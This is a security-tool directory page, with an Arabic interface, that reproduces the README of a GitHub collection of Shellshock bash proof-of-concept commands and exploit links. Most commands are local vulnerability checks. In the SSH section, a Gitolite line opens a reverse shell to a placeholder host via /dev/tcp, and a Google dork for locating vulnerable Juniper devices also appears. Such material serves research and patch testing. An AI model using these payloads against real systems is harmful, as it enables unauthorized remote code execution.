Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
shellshocker-pocs — مجموعة من إثباتات المفهوم والأهداف المحتملة لـ #ShellShocker | Kitploit
أدوات/GitHubGitHub/mubix/shellshocker-pocs
ماسحات الثغرات الأمنيةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقموارد منسقة
GitHubmubix/shellshocker-pocs

shellshocker-pocs

مجموعة من إثباتات المفهوم والأهداف المحتملة لـ #ShellShocker

عرض المستودع
8891905منذ 6 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

Shellshocker - مستودع أكواد إثبات المفهوم لثغرة "Shellshock"

مجموعة من إثباتات المفهوم والأهداف المحتملة لـ #ShellShocker

رابط ويكيبيديا: https://en.wikipedia.org/wiki/Shellshock_%28software_bug%29#CVE-2014-7186_and_CVE-2014-7187_Details

يرجى تقديم طلب سحب (pull request) إذا كان لديك المزيد من الروابط أو الموارد الأخرى

تخمين: (غير مؤكد، قد يكون قابلاً للاستغلال)

  • XMPP(ejabberd)
  • Mailman - مؤكد أنه غير قابل للاستغلال
  • MySQL
  • NFS
  • Bind9
  • Procmail انظر
  • Exim انظر
  • بحث جوجل Juniperinurl:inurl:/dana-na/auth/url_default/welcome.cgi
    • عبر: https://twitter.com/notsosecure/status/516132301025984512
    • عبر: http://kb.juniper.net/InfoCenter/index?page=content&id=JSA10648&actp=RSS
  • معدات Cisco
    • عبر: http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140926-bash
  • FreePB / Asterix
تم تصحيحه هنا

إذا كانت لديك أكواد PoC لأي من هذه، فيرجى تقديم issue أو pull request مع رابط.

سطر الأوامر (لينكس، OSX، وويندوز عبر Cygwin)

  • bashcheck - سكربت لاختبار أحدث الثغرات

CVE-2014-6271

  • env X='() { :; }; echo "CVE-2014-6271 vulnerable"' bash -c id

CVE-2014-7169

سينشئ ملفًا باسم echo في دليل العمل الحالي مع التاريخ بداخله، إذا كانت الثغرة موجودة

  • env X='() { (a)=>\' bash -c "echo date"; cat echo

CVE-2014-7186

  • bash -c 'true <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF' || echo "CVE-2014-7186 vulnerable, redir_stack"

CVE-2014-7187

  • (for x in {1..200} ; do echo "for x$x in ; do :"; done; for x in {1..200} ; do echo done ; done) | bash || echo "CVE-2014-7187 vulnerable, word_lineno"

CVE-2014-6278

  • env X='() { _; } >_[$($())] { echo CVE-2014-6278 vulnerable; id; }' bash -c :
  • معلومات إضافية: http://lcamtuf.blogspot.com/2014/10/bash-bug-how-we-finally-cracked.html

CVE-2014-6277

سيحدث خطأ تجزئة (segfault) إذا كانت الثغرة موجودة

  • env X='() { x() { _; }; x() { _; } <<a; }' bash -c :
  • نقاش إضافي على قائمة fulldisclosure: http://seclists.org/fulldisclosure/2014/Oct/9
  • معلومات إضافية: http://lcamtuf.blogspot.com/2014/10/bash-bug-how-we-finally-cracked.html

IBM z/OS -

  • http://mainframed767.tumblr.com/post/98446455927/bad-news-is-it-totally-works-in-bash-on-z-os-and

HTTP

  • وحدة استغلال Metasploit - Apache mod_cgi Bash Environment Variable Code Injection (Shellshock)
  • وحدة استغلال Metasploit - Advantech Switch Bash Environment Variable Code Injection (Shellshock)
  • وحدة استغلال Metasploit - IPFire Bash Environment Variable Injection (Shellshock)
  • تلويث ترويسة HTTP بواسطة @irsdl - http://pastebin.com/QNkf7dYS
  • HTTP CGI-BIN - http://pastebin.com/166f8Rjx
  • cPanel - http://blog.sucuri.net/2014/09/bash-vulnerability-shell-shock-thousands-of-cpanel-sites-are-high-risk.html
  • Digital Alert Systems DASDEC - http://seclists.org/fulldisclosure/2014/Sep/107
  • F5 - https://twitter.com/securifybv/status/515035044294172673
    • https://twitter.com/securifybv/status/515035044294172673/photo/1
    • https://twitter.com/avalidnerd/status/515056463589675008
      • https://twitter.com/avalidnerd/status/515056463589675008/photo/1
  • Invisiblethreat.ca - https://www.invisiblethreat.ca/2014/09/cve-2014-6271/
  • نسخة سطر الأوامر - https://gist.github.com/mfadzilr/70892f43597e7863a8dc
  • شرح عملي قائم على User-Agent باستخدام LiveHTTPHeaders - http://www.lykostech.net/lab-time-exploiting-shellshock-bash-bug-virtual-server/
  • شرح عملي قائم على User-Agent باستخدام Burp - http://oleaass.com/shellshock-proof-of-concept-reverse-shell/
  • قائم على User-Agent ولكنه يدعم Tor وSocks5 (بايثون) - https://github.com/lnxg33k/misc/blob/master/shellshock.py
  • قائم على User-Agent بلغة Ruby - https://github.com/securusglobal/BadBash
  • ماسح بسيط قائم على الترويسات يستخدم sleep مع دعم تعدد الخيوط - https://github.com/gry/shellshock-scanner
  • shocker - يفحص قائمة عناوين URL في ملف، أو عنوان URL واحد، مقابل قائمة بموارد CGI المعروفة بأنها قابلة للاستغلال (طريقة Content-type)
  • Xymon - https://lists.xymon.com/archive/2014-September/040350.html
  • QNAP - https://www.exploit-db.com/exploits/36503

Phusion Passenger

  • https://news.ycombinator.com/item?id=8369776

DHCP

  • استغلال Trusted sec عبر Tftpd32 - https://www.trustedsec.com/september-2014/shellshock-dhcp-rce-proof-concept/
  • وحدة استغلال Metasploit - Dhclient Bash Environment Variable Injection (Shellshock)
  • وحدة Metasploit المساعدة - https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/server/dhclient_bash_env.rb
  • سكربت Perl - http://pastebin.com/S1WVzTv9
  • استخدام Wi-Fi pineapple لإجبار الأشخاص على الانضمام إلى الشبكة - http://d.uijn.nl/?p=32

SSH

  • Stack Overflow - http://unix.stackexchange.com/questions/157477/how-can-shellshock-be-exploited-over-ssh
  • SSH ForcedCommand - https://twitter.com/JZdziarski/status/515205581226123264
    • https://twitter.com/JZdziarski/status/515205581226123264/photo/1
  • SendEnv: LC_X='() { :; }; echo vulnerable' ssh [email protected] -o SendEnv=LC_X
  • Gitolite - https://twitter.com/Grifo/status/515089986161766400
    • $ ssh GITOLITEUSER@VULNERABLEIP '() { ignore;}; /bin/bash -i >& /dev/tcp/REVERSESHELLIP/PORT 0>&1'
    • (من الضروري امتلاك حساب git على الخادم)

OSX

  • تصعيد الامتيازات عبر VMware Fusion - https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/osx/local/vmware_bash_function_root.rb
  • الإصلاح: http://support.apple.com/kb/DL1769

OSX - مع DNS عكسي (CVE-2014-3671.txt)

  • ملف منطقة مثال: in-addr.arpa يحتوي على مثال CVE-2014-6271.
  • ملف مثال يحتوي على استدعاء getnameinfo() يمرر إلى setenv(): osx-rev-ptr.c
  • نشرة استشارية مع وصف لما سبق CVE-2014-3671.txt

SIP

  • وكلاء SIP: https://github.com/zaf/sipshock

Qmail

  • شرح عملي مفصّل - http://marc.info/?l=qmail&m=141183309314366&w=2
  • تغريدة من @ymzkei5 - http://twitter.com/ymzkei5/status/515328039765307392
    • http://twitpic.com/ec3615
    • http://twitpic.com/ec361o

Postfix

  • http://packetstormsecurity.com/files/128572/postfixsmtp-shellshock.txt

FTP

  • Pure-FTPd: https://gist.github.com/jedisct1/88c62ee34e6fa92c31dc
  • وحدة استغلال Metasploit - Pure-FTPd External Authentication Bash Environment Variable Code Injection (Shellshock)

OpenVPN

  • OpenVPN - https://news.ycombinator.com/item?id=8385332
  • شرح عملي لـ PoC بواسطة @fj33r - http://sprunge.us/BGjP

Oracle

  • تنبيه وقائمة المنتجات المتأثرة

TMNT

  • https://twitter.com/SynAckPwn/status/514961810320293888/photo/1

Hand

  • عبر @DJManilaIce - http://pastie.org/9601055
root@kitploit:~
user@localhost:~$ env X='() { (a)=>\' /bin/bash -c "shellshocker echo -e \"           __ __\n          /  V  \ \n     _    |  |   |\n    / \   |  |   |\n    |  |  |  |   |\n    |  |  |  |   |\n    |  |__|  |   |\n    |  |  \  |___|___\n    |  \   |/        \ \n    |   |  |______    |\n    |   |  |          |\n    |   \__'   /     |\n    \        \(     /\n     \             /\n      \|            |\n\""; cat shellshocker
/bin/bash: X: line 1: syntax error near unexpected token `='
/bin/bash: X: line 1: `'
/bin/bash: error importing function definition for `X'
           __ __
          /  V  \ 
     _    |  |   |
    / \   |  |   |
    |  |  |  |   |
    |  |  |  |   |
    |  |__|  |   |
    |  |  \  |___|___
    |  \   |/        \ 
    |   |  |______    |
    |   |  |          |
    |   \__'   /     |
    \        \(     /
     \             /
      \|            |

CUPS

  • وحدة استغلال Metasploit - CUPS Filter Bash Environment Variable Code Injection

IRC

  • وحدة استغلال Metasploit - Xdh / LinuxNet Perlbot / fBot IRC Bot Remote Code Execution
  • وحدة استغلال Metasploit - Legend Perl IRC Bot Remote Code Execution

سكربتات من @primalsec

  • shell_shocker.py - مفيد للتفاعل مع عنوان URL معروف بأنه قابل للاستغلال لتمرير الأوامر (طريقة User-Agent)
  • w3af_shocker.py - يؤتمت عملية تشغيل فحص w3af spider/shell_shock (طريقة User-Agent)
  • shell_sprayer.py - يفحص قائمة عناوين URL في ملف، أو عنوان URL واحد، مقابل قائمة معروفة من موارد cgi-bin (طريقة User-Agent)
تنزيل الأداة